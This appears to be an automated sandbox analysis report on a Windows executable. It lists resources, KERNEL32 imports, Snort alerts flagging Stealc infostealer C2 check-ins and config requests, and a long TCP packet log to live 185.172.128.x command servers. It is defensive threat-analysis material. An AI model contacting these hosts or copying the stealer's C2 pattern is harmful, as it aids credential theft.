RT_ICON	0x3c5d090	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.5008196721311475
RT_ICON	0x3c5da18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5478723404255319
RT_STRING	0x3c5de80	0x428	data	0.45206766917293234
RT_STRING	0x3c5e2a8	0x3c8	data	0.4628099173553719
RT_GROUP_ICON	0x3c5e670	0x68	data	0.7115384615384616
RT_GROUP_ICON	0x3c5e6d8	0x68	data	0.6826923076923077
RT_GROUP_ICON	0x3c5e740	0x30	data	0.9375
RT_GROUP_ICON	0x3c5e770	0x76	data	0.6779661016949152
RT_VERSION	0x3c5e7e8	0x244	data	0.5396551724137931
RT_MANIFEST	0x3c5ea2c	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators	0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, GetExitCodeThread, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, GetOEMCP, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, HeapAlloc, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/27/24-00:45:59.672340	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/27/24-00:46:04.983919	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49733	80	192.168.2.4	185.172.128.76
04/27/24-00:46:05.537147	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49733	80	192.168.2.4	185.172.128.76
04/27/24-00:46:05.819615	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49733	185.172.128.76	192.168.2.4
04/27/24-00:46:05.948628	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49733	80	192.168.2.4	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2024 00:45:55.879575968 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 00:45:59.500699997 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 00:45:59.672159910 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 00:45:59.672245026 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 00:45:59.672339916 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 00:45:59.842413902 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 00:46:01.612524986 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 00:46:01.660737991 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 00:46:01.884876013 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 00:46:02.253475904 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 00:46:02.423681974 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 00:46:02.423882961 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 00:46:02.423996925 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 00:46:02.593996048 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 00:46:02.594557047 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 00:46:02.595443964 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 00:46:02.605808020 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.777580023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.777717113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.777806997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.948669910 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949529886 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949569941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949609041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949619055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.949647903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949685097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949693918 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.949724913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949764013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949767113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.949803114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949841022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949843884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:02.949878931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:02.949920893 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120253086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120409966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120450974 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120484114 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120491982 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120533943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120537996 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120573044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120609999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120620966 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120649099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120685101 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120707035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120722055 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120759010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120779037 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120796919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120840073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120846033 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120878935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120915890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120933056 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.120955944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120992899 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.120997906 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.121051073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.121088982 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.121093988 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.121126890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.121166945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.291943073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.291985035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292022943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292049885 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292063951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292123079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292125940 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292165041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292205095 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292216063 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292243958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292284012 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292298079 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292324066 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292365074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292371035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292404890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292445898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292454958 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292490005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292530060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292535067 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292568922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292618990 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292627096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292665005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292705059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292714119 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292746067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292783976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292792082 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292836905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292876005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292889118 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292913914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292953968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.292962074 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.292994976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293037891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293052912 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293075085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293116093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293121099 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293155909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293194056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293204069 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293231964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293270111 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293277979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293309927 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293346882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293356895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293387890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293426037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293436050 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293464899 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293503046 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293509007 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.293545008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.293591022 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.464731932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.464776039 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.464873075 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.464982986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465022087 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465082884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465120077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465159893 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465184927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465198040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465209961 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465236902 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465251923 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465286016 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465328932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465367079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465380907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465411901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465452909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465496063 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465558052 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465605974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465631962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465670109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465681076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465718985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465786934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465823889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465831041 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465868950 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465908051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.465950012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.465981007 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466018915 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466027975 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466063023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466152906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466200113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466315985 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466358900 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466415882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466460943 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466473103 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466515064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466517925 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466558933 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466586113 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466622114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466638088 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466660023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466670036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466700077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466705084 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466743946 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466773033 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466818094 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466873884 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.466917038 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.466974974 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467020988 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467044115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467082024 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467089891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467120886 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467124939 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467166901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467194080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467242956 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467263937 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467300892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467308998 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467345953 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467375994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467420101 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467479944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467533112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467551947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467600107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467623949 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467669964 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467757940 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467803955 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467858076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467895985 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.467905045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.467941999 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468030930 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468081951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468118906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468158007 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468163967 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468199015 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468208075 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468239069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468244076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468285084 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468311071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468348980 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468358040 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468391895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468450069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468487978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468493938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468530893 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468594074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468632936 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468642950 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468697071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468704939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468750954 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468775988 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468846083 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468902111 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468903065 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.468945026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.468990088 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469142914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469199896 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469315052 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469368935 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469388008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469438076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469484091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469535112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469722986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469772100 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469814062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.469860077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.469980001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470030069 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470067978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470107079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470113993 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470153093 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470180035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470225096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470268011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470313072 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470339060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470376968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470388889 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470423937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470432043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470477104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470536947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470586061 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470639944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470679045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.470689058 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.470721006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.635668993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.635778904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.635807991 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.635864973 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.635889053 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.635905027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.635947943 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.635977030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636007071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636015892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636055946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636065960 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636096001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636140108 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636148930 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636202097 CEST	80	49732	185.172.128.59	192.168.2.4
